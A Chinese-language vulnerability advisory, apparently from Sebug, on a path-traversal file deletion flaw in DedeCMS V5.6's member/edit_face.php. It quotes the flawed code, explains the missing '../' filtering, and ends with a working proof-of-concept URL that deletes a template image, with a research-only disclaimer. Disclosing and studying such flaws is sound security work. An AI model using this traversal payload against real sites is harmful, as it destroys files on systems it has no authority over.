织梦(Dedecms)V5.6 远程文件删除漏洞

漏洞版本:

DedeCmsV5.6

漏洞描述:

DedeCMS内容管理系统软件采用XML名字空间风格核心模板：模板全部使用文件形式保存，对用户设计模板、网站升级转移均提供很大的便利，健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。

edit_face.php



else if($dopost=='delold')  //45行

{

        if(empty($oldface))

        {

                ShowMsg("没有可删除的头像！", "-1");

                exit();

        }

        $userdir = $cfg_user_dir.'/'.$cfg_ml->M_ID;

        if(!ereg('^'.$userdir, $oldface))

        {

                $oldface = '';

        }

        if(eregi("\.(jpg|gif|png)$", $oldface) && file_exists($cfg_basedir.$oldface))

        {

                @unlink($cfg_basedir.$oldface);

        }



只判断oldface 前面是否在目录下，没包括过滤 ../

但有验证  \.(jpg|gif|png)$  ，所以只能删除  jpg , gif ,png 类型的文件

<* 参考

http://www.t00ls.net/
http://sebug.net/
http://sebug.net/appdir/织梦(DedeCms)

*>

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

1. http://ssvdb.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif